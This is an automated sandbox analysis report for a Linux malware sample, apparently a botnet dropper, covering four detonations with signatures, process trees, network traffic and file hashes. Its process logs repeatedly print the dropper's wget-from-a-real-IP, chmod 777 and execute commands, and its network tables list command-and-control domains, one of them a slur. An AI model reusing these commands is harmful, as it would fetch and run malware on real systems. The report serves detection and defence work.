Malware Analysis Report

2024-12-07 19:11

Sample ID 241114-dphfzsxlhp
Target d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown
SHA256 d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0
Tags
defense_evasion discovery credential_access
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0

Threat Level: Shows suspicious behavior

The file d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery credential_access

Executes dropped EXE

File and Directory Permissions Modification

Deletes itself

Unexpected DNS network traffic destination

Enumerates running processes

Reads process memory

Changes its process name

Writes file to tmp directory

Reads runtime system information

System Network Configuration Discovery

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-14 03:10

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-14 03:10

Reported

2024-11-14 03:13

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

0s

Max time network

134s

Command Line

[/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/earm /tmp/earm N/A
N/A /tmp/earm5 /tmp/earm5 N/A
N/A /tmp/earm7 /tmp/earm7 N/A
N/A /tmp/emips /tmp/emips N/A
N/A /tmp/empsl /tmp/empsl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/emips N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/empsl /usr/bin/wget N/A
File opened for modification /tmp/earm /usr/bin/wget N/A
File opened for modification /tmp/earm5 /usr/bin/wget N/A
File opened for modification /tmp/earm7 /usr/bin/wget N/A
File opened for modification /tmp/emips /usr/bin/wget N/A

Processes

/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown

[/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown]

/bin/rm

[rm -rf earm]

/usr/bin/wget

[wget http://185.157.247.125/c/earm]

/bin/chmod

[chmod 777 earm]

/tmp/earm

[./earm asus]

/bin/rm

[rm -rf earm]

/bin/rm

[rm -rf earm5]

/usr/bin/wget

[wget http://185.157.247.125/c/earm5]

/bin/chmod

[chmod 777 earm5]

/tmp/earm5

[./earm5 asus]

/bin/rm

[rm -rf earm5]

/bin/rm

[rm -rf earm6]

/usr/bin/wget

[wget http://185.157.247.125/c/earm6]

/bin/chmod

[chmod 777 earm6]

/tmp/earm6

[./earm6 asus]

/bin/rm

[rm -rf earm6]

/bin/rm

[rm -rf earm7]

/usr/bin/wget

[wget http://185.157.247.125/c/earm7]

/bin/chmod

[chmod 777 earm7]

/tmp/earm7

[./earm7 asus]

/bin/rm

[rm -rf earm7]

/bin/rm

[rm -rf emips]

/usr/bin/wget

[wget http://185.157.247.125/c/emips]

/bin/chmod

[chmod 777 emips]

/tmp/emips

[./emips asus]

/bin/rm

[rm -rf emips]

/bin/rm

[rm -rf empsl]

/usr/bin/wget

[wget http://185.157.247.125/c/empsl]

/bin/chmod

[chmod 777 empsl]

/tmp/empsl

[./empsl asus]

/bin/rm

[rm -rf empsl]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
FR 185.157.247.125:80 185.157.247.125 tcp
FR 185.157.247.125:80 185.157.247.125 tcp
FR 185.157.247.125:80 185.157.247.125 tcp
FR 185.157.247.125:80 185.157.247.125 tcp
US 151.101.129.91:443 tcp
FR 185.157.247.125:80 185.157.247.125 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.129.91:443 tcp
FR 185.157.247.125:80 185.157.247.125 tcp
GB 89.187.167.2:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.38:443 1527653184.rsc.cdn77.org tcp

Files

/tmp/earm

MD5 300cd530fb0a7f7cf6db875f68c0483e
SHA1 a4bce294dc142fb1354e917bed4d58c98f381850
SHA256 a033de6c1fc62202ed6c97bd7cf05aba7afb13ca591083eaf39f0b30dc8d7885
SHA512 656055bbcc49b7edeb1102887cfab16b4d425f8964433b0f08fd40e9ec63b7398661ecd73951031731f7c98ea8af8773b0e3d486c09f0eae977f4ab0862c66a1

/tmp/earm5

MD5 17b0ebeb1226ffff541eb2551cc542ae
SHA1 f08a0c96f0ec5df5e5de2f399ef319e514fa799e
SHA256 02f8431d1bf70570d5bd9cdebb3bdf457f3296d508139506767413b9b982b3c9
SHA512 2692b1de8ecb7a8d5e95c8ea2ac423483f7c619fa624662fbe74f8949d2db0ee59a12ad5bd6d873e123fed97daea139bb94bb25d4f7c712a1bc55bc1a096f72a

/tmp/earm7

MD5 521069251bdce0fbd37497b8f527ab23
SHA1 020730190edde76dec3de9678351aa6e65ab91bf
SHA256 aa5db395352aff621bc290b0eb2f7715230f93556ac99cc056cd22a56a5adc72
SHA512 09e176cdbcb48370c273ea4733d1c0c8f64625f2070ab7742b929268d5cb6bd97d091c884223777ccd0877209d65db1c8d56adaf3063d7fcfc9f44e127649f70

/tmp/emips

MD5 c0b34d8a59f793b636b5424b8e96a64a
SHA1 d5eac6c7b3a5953ffcd642de9db2cd1c45463e96
SHA256 defb122644753c1493b140e9bb7b6df824197a475f39af66f50ae93190e43270
SHA512 57446ac19971a42d6dc72b0ce14e7771efed16b9da6b86102ec4540cdc16103557e48eb957a822543d825cada502700d8f225d4b47d93c5e43e7fd8c55ba25d4

/tmp/empsl

MD5 3cfc76868e26201ac03e0583b7c8aaba
SHA1 03436d9d090e1f944fecf60adc1e45f90df20c26
SHA256 8c825ecd4fff08b44d8334e022dc0d6eedbe9a1b61469e523025d7968be2e84d
SHA512 84add49907a7c8818abc31118e16e8becf3bb41bcf814139fe0c99617b9ff46dc228be8a319e3fd80f0a672bc056cb30bb75ff0a4ed03418cd06cc95ef5070b2

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-14 03:10

Reported

2024-11-14 03:13

Platform

debian9-armhf-20240611-en

Max time kernel

149s

Max time network

153s

Command Line

[/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Deletes itself

Description Indicator Process Target
N/A N/A /tmp/earm N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/earm /tmp/earm N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 195.10.195.195 N/A N/A
Destination IP 168.235.111.72 N/A N/A
Destination IP 168.138.12.137 N/A N/A
Destination IP 168.235.111.72 N/A N/A
Destination IP 38.103.195.4 N/A N/A
Destination IP 81.169.136.222 N/A N/A

Enumerates running processes

Reads process memory

credential_access
Description Indicator Process Target
File opened for reading /proc/302/maps /tmp/earm N/A
File opened for reading /proc/305/maps /tmp/earm N/A
File opened for reading /proc/461/maps /tmp/earm N/A
File opened for reading /proc/462/maps /tmp/earm N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself N/A /tmp/earm N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/605/cmdline /tmp/earm N/A
File opened for reading /proc/734/status /tmp/earm N/A
File opened for reading /proc/772/cmdline /tmp/earm N/A
File opened for reading /proc/975/cmdline /tmp/earm N/A
File opened for reading /proc/1020/cmdline /tmp/earm N/A
File opened for reading /proc/1195/status /tmp/earm N/A
File opened for reading /proc/1233/cmdline /tmp/earm N/A
File opened for reading /proc/137/cmdline /tmp/earm N/A
File opened for reading /proc/778/cmdline /tmp/earm N/A
File opened for reading /proc/1218/cmdline /tmp/earm N/A
File opened for reading /proc/690/cmdline /tmp/earm N/A
File opened for reading /proc/758/cmdline /tmp/earm N/A
File opened for reading /proc/787/cmdline /tmp/earm N/A
File opened for reading /proc/1044/cmdline /tmp/earm N/A
File opened for reading /proc/1141/status /tmp/earm N/A
File opened for reading /proc/1266/cmdline /tmp/earm N/A
File opened for reading /proc/1280/cmdline /tmp/earm N/A
File opened for reading /proc/1347/cmdline /tmp/earm N/A
File opened for reading /proc/1349/cmdline /tmp/earm N/A
File opened for reading /proc/1393/cmdline /tmp/earm N/A
File opened for reading /proc/738/cmdline /tmp/earm N/A
File opened for reading /proc/873/cmdline /tmp/earm N/A
File opened for reading /proc/913/cmdline /tmp/earm N/A
File opened for reading /proc/966/cmdline /tmp/earm N/A
File opened for reading /proc/972/cmdline /tmp/earm N/A
File opened for reading /proc/1051/cmdline /tmp/earm N/A
File opened for reading /proc/772/status /tmp/earm N/A
File opened for reading /proc/776/cmdline /tmp/earm N/A
File opened for reading /proc/914/cmdline /tmp/earm N/A
File opened for reading /proc/1217/cmdline /tmp/earm N/A
File opened for reading /proc/1423/cmdline /tmp/earm N/A
File opened for reading /proc/711/cmdline /tmp/earm N/A
File opened for reading /proc/961/cmdline /tmp/earm N/A
File opened for reading /proc/1169/cmdline /tmp/earm N/A
File opened for reading /proc/1221/cmdline /tmp/earm N/A
File opened for reading /proc/1282/cmdline /tmp/earm N/A
File opened for reading /proc/689/cmdline /tmp/earm N/A
File opened for reading /proc/877/cmdline /tmp/earm N/A
File opened for reading /proc/1007/status /tmp/earm N/A
File opened for reading /proc/1017/cmdline /tmp/earm N/A
File opened for reading /proc/1254/cmdline /tmp/earm N/A
File opened for reading /proc/686/cmdline /tmp/earm N/A
File opened for reading /proc/701/cmdline /tmp/earm N/A
File opened for reading /proc/733/cmdline /tmp/earm N/A
File opened for reading /proc/828/cmdline /tmp/earm N/A
File opened for reading /proc/1023/cmdline /tmp/earm N/A
File opened for reading /proc/1055/cmdline /tmp/earm N/A
File opened for reading /proc/1171/cmdline /tmp/earm N/A
File opened for reading /proc/1330/status /tmp/earm N/A
File opened for reading /proc/764/cmdline /tmp/earm N/A
File opened for reading /proc/850/cmdline /tmp/earm N/A
File opened for reading /proc/1002/cmdline /tmp/earm N/A
File opened for reading /proc/1111/cmdline /tmp/earm N/A
File opened for reading /proc/1130/cmdline /tmp/earm N/A
File opened for reading /proc/1162/cmdline /tmp/earm N/A
File opened for reading /proc/1381/cmdline /tmp/earm N/A
File opened for reading /proc/23/cmdline /tmp/earm N/A
File opened for reading /proc/1110/cmdline /tmp/earm N/A
File opened for reading /proc/1191/cmdline /tmp/earm N/A
File opened for reading /proc/1212/cmdline /tmp/earm N/A
File opened for reading /proc/1256/cmdline /tmp/earm N/A
File opened for reading /proc/714/cmdline /tmp/earm N/A
File opened for reading /proc/752/cmdline /tmp/earm N/A
File opened for reading /proc/922/cmdline /tmp/earm N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/emips N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/earm /usr/bin/wget N/A

Processes

/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown

[/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown]

/bin/rm

[rm -rf earm]

/usr/bin/wget

[wget http://185.157.247.125/c/earm]

/bin/chmod

[chmod 777 earm]

/tmp/earm

[./earm asus]

/bin/rm

[rm -rf earm]

/bin/rm

[rm -rf earm5]

/usr/bin/wget

[wget http://185.157.247.125/c/earm5]

/bin/chmod

[chmod 777 earm5]

/tmp/earm5

[./earm5 asus]

/bin/rm

[rm -rf earm5]

/bin/rm

[rm -rf earm6]

/usr/bin/wget

[wget http://185.157.247.125/c/earm6]

/bin/chmod

[chmod 777 earm6]

/tmp/earm6

[./earm6 asus]

/bin/rm

[rm -rf earm6]

/bin/rm

[rm -rf earm7]

/usr/bin/wget

[wget http://185.157.247.125/c/earm7]

/bin/chmod

[chmod 777 earm7]

/tmp/earm7

[./earm7 asus]

/bin/rm

[rm -rf earm7]

/bin/rm

[rm -rf emips]

/usr/bin/wget

[wget http://185.157.247.125/c/emips]

/bin/chmod

[chmod 777 emips]

/tmp/emips

[./emips asus]

/bin/rm

[rm -rf emips]

/bin/rm

[rm -rf empsl]

/usr/bin/wget

[wget http://185.157.247.125/c/empsl]

/bin/chmod

[chmod 777 empsl]

/tmp/empsl

[./empsl asus]

/bin/rm

[rm -rf empsl]

Network

Country Destination Domain Proto
FR 185.157.247.125:80 185.157.247.125 tcp
US 168.235.111.72:53 trump2024.oss udp
GB 45.95.18.100:4096 trump2024.oss tcp
US 146.71.81.108:4096 trump2024.oss tcp
US 144.208.127.181:4096 trump2024.oss tcp
AU 203.96.177.158:4096 trump2024.oss tcp
DE 195.10.195.195:53 liberalretard.libre udp
US 144.208.127.181:4096 liberalretard.libre tcp
US 146.71.81.108:4096 liberalretard.libre tcp
AU 203.96.177.158:4096 liberalretard.libre tcp
GB 45.95.18.100:4096 liberalretard.libre tcp
AU 168.138.12.137:53 trump2024.oss udp
US 146.71.81.108:4096 trump2024.oss tcp
GB 45.95.18.100:4096 trump2024.oss tcp
US 144.208.127.181:4096 trump2024.oss tcp
AU 203.96.177.158:4096 trump2024.oss tcp
US 168.235.111.72:53 trump2024.oss udp
US 144.208.127.181:4096 trump2024.oss tcp
US 146.71.81.108:4096 trump2024.oss tcp
AU 203.96.177.158:4096 trump2024.oss tcp
GB 45.95.18.100:4096 trump2024.oss tcp
CA 38.103.195.4:53 liberalretard.libre udp
US 146.71.81.108:4096 liberalretard.libre tcp
GB 45.95.18.100:4096 liberalretard.libre tcp
US 144.208.127.181:4096 liberalretard.libre tcp
AU 203.96.177.158:4096 liberalretard.libre tcp
DE 81.169.136.222:53 trump2024.oss udp
US 146.71.81.108:4096 trump2024.oss tcp
AU 203.96.177.158:4096 trump2024.oss tcp
GB 45.95.18.100:4096 trump2024.oss tcp
US 144.208.127.181:4096 trump2024.oss tcp
US 1.1.1.1:53 xaiverbot.net udp
AU 203.96.177.158:4096 xaiverbot.net tcp
NL 185.198.234.82:4096 xaiverbot.net tcp
US 146.71.81.108:4096 xaiverbot.net tcp
US 144.208.127.181:4096 xaiverbot.net tcp

Files

/tmp/earm

MD5 300cd530fb0a7f7cf6db875f68c0483e
SHA1 a4bce294dc142fb1354e917bed4d58c98f381850
SHA256 a033de6c1fc62202ed6c97bd7cf05aba7afb13ca591083eaf39f0b30dc8d7885
SHA512 656055bbcc49b7edeb1102887cfab16b4d425f8964433b0f08fd40e9ec63b7398661ecd73951031731f7c98ea8af8773b0e3d486c09f0eae977f4ab0862c66a1

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-14 03:10

Reported

2024-11-14 03:13

Platform

debian9-mipsbe-20240611-en

Max time kernel

150s

Max time network

151s

Command Line

[/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Deletes itself

Description Indicator Process Target
N/A N/A /tmp/emips N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/earm /tmp/earm N/A
N/A /tmp/earm5 /tmp/earm5 N/A
N/A /tmp/earm7 /tmp/earm7 N/A
N/A /tmp/emips /tmp/emips N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 138.197.140.189 N/A N/A
Destination IP 51.77.149.139 N/A N/A
Destination IP 9.9.9.9 N/A N/A
Destination IP 162.243.19.47 N/A N/A

Enumerates running processes

Reads process memory

credential_access
Description Indicator Process Target
File opened for reading /proc/383/maps /tmp/emips N/A
File opened for reading /proc/385/maps /tmp/emips N/A
File opened for reading /proc/679/maps /tmp/emips N/A
File opened for reading /proc/680/maps /tmp/emips N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself N/A /tmp/emips N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/848/cmdline /tmp/emips N/A
File opened for reading /proc/865/cmdline /tmp/emips N/A
File opened for reading /proc/929/status /tmp/emips N/A
File opened for reading /proc/961/cmdline /tmp/emips N/A
File opened for reading /proc/992/cmdline /tmp/emips N/A
File opened for reading /proc/1041/status /tmp/emips N/A
File opened for reading /proc/1233/cmdline /tmp/emips N/A
File opened for reading /proc/796/cmdline /tmp/emips N/A
File opened for reading /proc/897/cmdline /tmp/emips N/A
File opened for reading /proc/971/cmdline /tmp/emips N/A
File opened for reading /proc/1068/cmdline /tmp/emips N/A
File opened for reading /proc/1156/cmdline /tmp/emips N/A
File opened for reading /proc/1163/cmdline /tmp/emips N/A
File opened for reading /proc/770/cmdline /tmp/emips N/A
File opened for reading /proc/1072/cmdline /tmp/emips N/A
File opened for reading /proc/1162/cmdline /tmp/emips N/A
File opened for reading /proc/1231/status /tmp/emips N/A
File opened for reading /proc/862/cmdline /tmp/emips N/A
File opened for reading /proc/850/cmdline /tmp/emips N/A
File opened for reading /proc/1007/cmdline /tmp/emips N/A
File opened for reading /proc/1023/cmdline /tmp/emips N/A
File opened for reading /proc/1194/cmdline /tmp/emips N/A
File opened for reading /proc/788/cmdline /tmp/emips N/A
File opened for reading /proc/894/cmdline /tmp/emips N/A
File opened for reading /proc/1044/cmdline /tmp/emips N/A
File opened for reading /proc/1059/cmdline /tmp/emips N/A
File opened for reading /proc/1065/cmdline /tmp/emips N/A
File opened for reading /proc/1094/cmdline /tmp/emips N/A
File opened for reading /proc/1282/cmdline /tmp/emips N/A
File opened for reading /proc/418/cmdline /tmp/emips N/A
File opened for reading /proc/934/cmdline /tmp/emips N/A
File opened for reading /proc/1033/cmdline /tmp/emips N/A
File opened for reading /proc/1109/cmdline /tmp/emips N/A
File opened for reading /proc/1116/cmdline /tmp/emips N/A
File opened for reading /proc/1118/cmdline /tmp/emips N/A
File opened for reading /proc/1203/status /tmp/emips N/A
File opened for reading /proc/1222/cmdline /tmp/emips N/A
File opened for reading /proc/881/cmdline /tmp/emips N/A
File opened for reading /proc/880/cmdline /tmp/emips N/A
File opened for reading /proc/939/cmdline /tmp/emips N/A
File opened for reading /proc/1096/cmdline /tmp/emips N/A
File opened for reading /proc/1141/cmdline /tmp/emips N/A
File opened for reading /proc/1293/cmdline /tmp/emips N/A
File opened for reading /proc/801/cmdline /tmp/emips N/A
File opened for reading /proc/1235/cmdline /tmp/emips N/A
File opened for reading /proc/1264/cmdline /tmp/emips N/A
File opened for reading /proc/804/cmdline /tmp/emips N/A
File opened for reading /proc/853/cmdline /tmp/emips N/A
File opened for reading /proc/810/cmdline /tmp/emips N/A
File opened for reading /proc/929/cmdline /tmp/emips N/A
File opened for reading /proc/1010/cmdline /tmp/emips N/A
File opened for reading /proc/1125/cmdline /tmp/emips N/A
File opened for reading /proc/704/cmdline /tmp/emips N/A
File opened for reading /proc/834/cmdline /tmp/emips N/A
File opened for reading /proc/1022/cmdline /tmp/emips N/A
File opened for reading /proc/1138/cmdline /tmp/emips N/A
File opened for reading /proc/1153/cmdline /tmp/emips N/A
File opened for reading /proc/776/cmdline /tmp/emips N/A
File opened for reading /proc/920/cmdline /tmp/emips N/A
File opened for reading /proc/982/cmdline /tmp/emips N/A
File opened for reading /proc/997/cmdline /tmp/emips N/A
File opened for reading /proc/1081/cmdline /tmp/emips N/A
File opened for reading /proc/1170/cmdline /tmp/emips N/A
File opened for reading /proc/1211/cmdline /tmp/emips N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/emips N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/earm /usr/bin/wget N/A
File opened for modification /tmp/earm5 /usr/bin/wget N/A
File opened for modification /tmp/earm7 /usr/bin/wget N/A
File opened for modification /tmp/emips /usr/bin/wget N/A

Processes

/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown

[/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown]

/bin/rm

[rm -rf earm]

/usr/bin/wget

[wget http://185.157.247.125/c/earm]

/bin/chmod

[chmod 777 earm]

/tmp/earm

[./earm asus]

/bin/rm

[rm -rf earm]

/bin/rm

[rm -rf earm5]

/usr/bin/wget

[wget http://185.157.247.125/c/earm5]

/bin/chmod

[chmod 777 earm5]

/tmp/earm5

[./earm5 asus]

/bin/rm

[rm -rf earm5]

/bin/rm

[rm -rf earm6]

/usr/bin/wget

[wget http://185.157.247.125/c/earm6]

/bin/chmod

[chmod 777 earm6]

/tmp/earm6

[./earm6 asus]

/bin/rm

[rm -rf earm6]

/bin/rm

[rm -rf earm7]

/usr/bin/wget

[wget http://185.157.247.125/c/earm7]

/bin/chmod

[chmod 777 earm7]

/tmp/earm7

[./earm7 asus]

/bin/rm

[rm -rf earm7]

/bin/rm

[rm -rf emips]

/usr/bin/wget

[wget http://185.157.247.125/c/emips]

/bin/chmod

[chmod 777 emips]

/tmp/emips

[./emips asus]

/bin/rm

[rm -rf emips]

/bin/rm

[rm -rf empsl]

/usr/bin/wget

[wget http://185.157.247.125/c/empsl]

/bin/chmod

[chmod 777 empsl]

/tmp/empsl

[./empsl asus]

/bin/rm

[rm -rf empsl]

Network

Country Destination Domain Proto
FR 185.157.247.125:80 185.157.247.125 tcp
FR 185.157.247.125:80 185.157.247.125 tcp
FR 185.157.247.125:80 185.157.247.125 tcp
FR 185.157.247.125:80 185.157.247.125 tcp
FR 185.157.247.125:80 185.157.247.125 tcp
US 162.243.19.47:53 liberalretard.libre udp
US 144.208.127.181:4096 liberalretard.libre tcp
AU 203.96.177.158:4096 liberalretard.libre tcp
GB 45.95.18.100:4096 liberalretard.libre tcp
US 146.71.81.108:4096 liberalretard.libre tcp
CA 138.197.140.189:53 liberalretard.libre udp
US 146.71.81.108:4096 liberalretard.libre tcp
GB 45.95.18.100:4096 liberalretard.libre tcp
US 144.208.127.181:4096 liberalretard.libre tcp
AU 203.96.177.158:4096 liberalretard.libre tcp
CH 9.9.9.9:53 xaiverbot.net udp
US 144.208.127.181:4096 xaiverbot.net tcp
AU 203.96.177.158:4096 xaiverbot.net tcp
NL 185.198.234.82:4096 xaiverbot.net tcp
GB 45.95.18.100:4096 xaiverbot.net tcp
US 146.71.81.108:4096 xaiverbot.net tcp
FR 51.77.149.139:53 trump2024.oss udp
US 144.208.127.181:4096 trump2024.oss tcp
AU 203.96.177.158:4096 trump2024.oss tcp
GB 45.95.18.100:4096 trump2024.oss tcp
US 146.71.81.108:4096 trump2024.oss tcp

Files

/tmp/earm

MD5 300cd530fb0a7f7cf6db875f68c0483e
SHA1 a4bce294dc142fb1354e917bed4d58c98f381850
SHA256 a033de6c1fc62202ed6c97bd7cf05aba7afb13ca591083eaf39f0b30dc8d7885
SHA512 656055bbcc49b7edeb1102887cfab16b4d425f8964433b0f08fd40e9ec63b7398661ecd73951031731f7c98ea8af8773b0e3d486c09f0eae977f4ab0862c66a1

/tmp/earm5

MD5 17b0ebeb1226ffff541eb2551cc542ae
SHA1 f08a0c96f0ec5df5e5de2f399ef319e514fa799e
SHA256 02f8431d1bf70570d5bd9cdebb3bdf457f3296d508139506767413b9b982b3c9
SHA512 2692b1de8ecb7a8d5e95c8ea2ac423483f7c619fa624662fbe74f8949d2db0ee59a12ad5bd6d873e123fed97daea139bb94bb25d4f7c712a1bc55bc1a096f72a

/tmp/earm7

MD5 521069251bdce0fbd37497b8f527ab23
SHA1 020730190edde76dec3de9678351aa6e65ab91bf
SHA256 aa5db395352aff621bc290b0eb2f7715230f93556ac99cc056cd22a56a5adc72
SHA512 09e176cdbcb48370c273ea4733d1c0c8f64625f2070ab7742b929268d5cb6bd97d091c884223777ccd0877209d65db1c8d56adaf3063d7fcfc9f44e127649f70

/tmp/emips

MD5 c0b34d8a59f793b636b5424b8e96a64a
SHA1 d5eac6c7b3a5953ffcd642de9db2cd1c45463e96
SHA256 defb122644753c1493b140e9bb7b6df824197a475f39af66f50ae93190e43270
SHA512 57446ac19971a42d6dc72b0ce14e7771efed16b9da6b86102ec4540cdc16103557e48eb957a822543d825cada502700d8f225d4b47d93c5e43e7fd8c55ba25d4

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-14 03:10

Reported

2024-11-14 03:13

Platform

debian9-mipsel-20240611-en

Max time kernel

141s

Max time network

142s

Command Line

[/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Deletes itself

Description Indicator Process Target
N/A N/A /tmp/empsl N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/earm /tmp/earm N/A
N/A /tmp/earm5 /tmp/earm5 N/A
N/A /tmp/earm7 /tmp/earm7 N/A
N/A /tmp/emips /tmp/emips N/A
N/A /tmp/empsl /tmp/empsl N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 103.1.206.179 N/A N/A
Destination IP 9.9.9.9 N/A N/A
Destination IP 162.243.19.47 N/A N/A
Destination IP 208.67.222.222 N/A N/A

Enumerates running processes

Reads process memory

credential_access
Description Indicator Process Target
File opened for reading /proc/668/maps /tmp/empsl N/A
File opened for reading /proc/669/maps /tmp/empsl N/A
File opened for reading /proc/370/maps /tmp/empsl N/A
File opened for reading /proc/371/maps /tmp/empsl N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself N/A /tmp/empsl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/781/cmdline /tmp/empsl N/A
File opened for reading /proc/857/cmdline /tmp/empsl N/A
File opened for reading /proc/1464/cmdline /tmp/empsl N/A
File opened for reading /proc/949/cmdline /tmp/empsl N/A
File opened for reading /proc/1308/cmdline /tmp/empsl N/A
File opened for reading /proc/1485/cmdline /tmp/empsl N/A
File opened for reading /proc/901/cmdline /tmp/empsl N/A
File opened for reading /proc/1005/cmdline /tmp/empsl N/A
File opened for reading /proc/1251/cmdline /tmp/empsl N/A
File opened for reading /proc/1489/cmdline /tmp/empsl N/A
File opened for reading /proc/1291/cmdline /tmp/empsl N/A
File opened for reading /proc/1336/cmdline /tmp/empsl N/A
File opened for reading /proc/769/cmdline /tmp/empsl N/A
File opened for reading /proc/959/cmdline /tmp/empsl N/A
File opened for reading /proc/1107/cmdline /tmp/empsl N/A
File opened for reading /proc/1273/cmdline /tmp/empsl N/A
File opened for reading /proc/1313/cmdline /tmp/empsl N/A
File opened for reading /proc/1317/cmdline /tmp/empsl N/A
File opened for reading /proc/1352/cmdline /tmp/empsl N/A
File opened for reading /proc/1367/cmdline /tmp/empsl N/A
File opened for reading /proc/770/cmdline /tmp/empsl N/A
File opened for reading /proc/878/cmdline /tmp/empsl N/A
File opened for reading /proc/890/status /tmp/empsl N/A
File opened for reading /proc/1074/cmdline /tmp/empsl N/A
File opened for reading /proc/1388/cmdline /tmp/empsl N/A
File opened for reading /proc/967/cmdline /tmp/empsl N/A
File opened for reading /proc/981/cmdline /tmp/empsl N/A
File opened for reading /proc/1315/cmdline /tmp/empsl N/A
File opened for reading /proc/1449/cmdline /tmp/empsl N/A
File opened for reading /proc/1263/status /tmp/empsl N/A
File opened for reading /proc/1427/cmdline /tmp/empsl N/A
File opened for reading /proc/1396/cmdline /tmp/empsl N/A
File opened for reading /proc/1479/status /tmp/empsl N/A
File opened for reading /proc/860/status /tmp/empsl N/A
File opened for reading /proc/947/cmdline /tmp/empsl N/A
File opened for reading /proc/958/cmdline /tmp/empsl N/A
File opened for reading /proc/1187/cmdline /tmp/empsl N/A
File opened for reading /proc/902/cmdline /tmp/empsl N/A
File opened for reading /proc/1214/cmdline /tmp/empsl N/A
File opened for reading /proc/37/cmdline /tmp/empsl N/A
File opened for reading /proc/884/cmdline /tmp/empsl N/A
File opened for reading /proc/1115/cmdline /tmp/empsl N/A
File opened for reading /proc/1447/cmdline /tmp/empsl N/A
File opened for reading /proc/802/cmdline /tmp/empsl N/A
File opened for reading /proc/1390/cmdline /tmp/empsl N/A
File opened for reading /proc/882/cmdline /tmp/empsl N/A
File opened for reading /proc/1016/cmdline /tmp/empsl N/A
File opened for reading /proc/1102/cmdline /tmp/empsl N/A
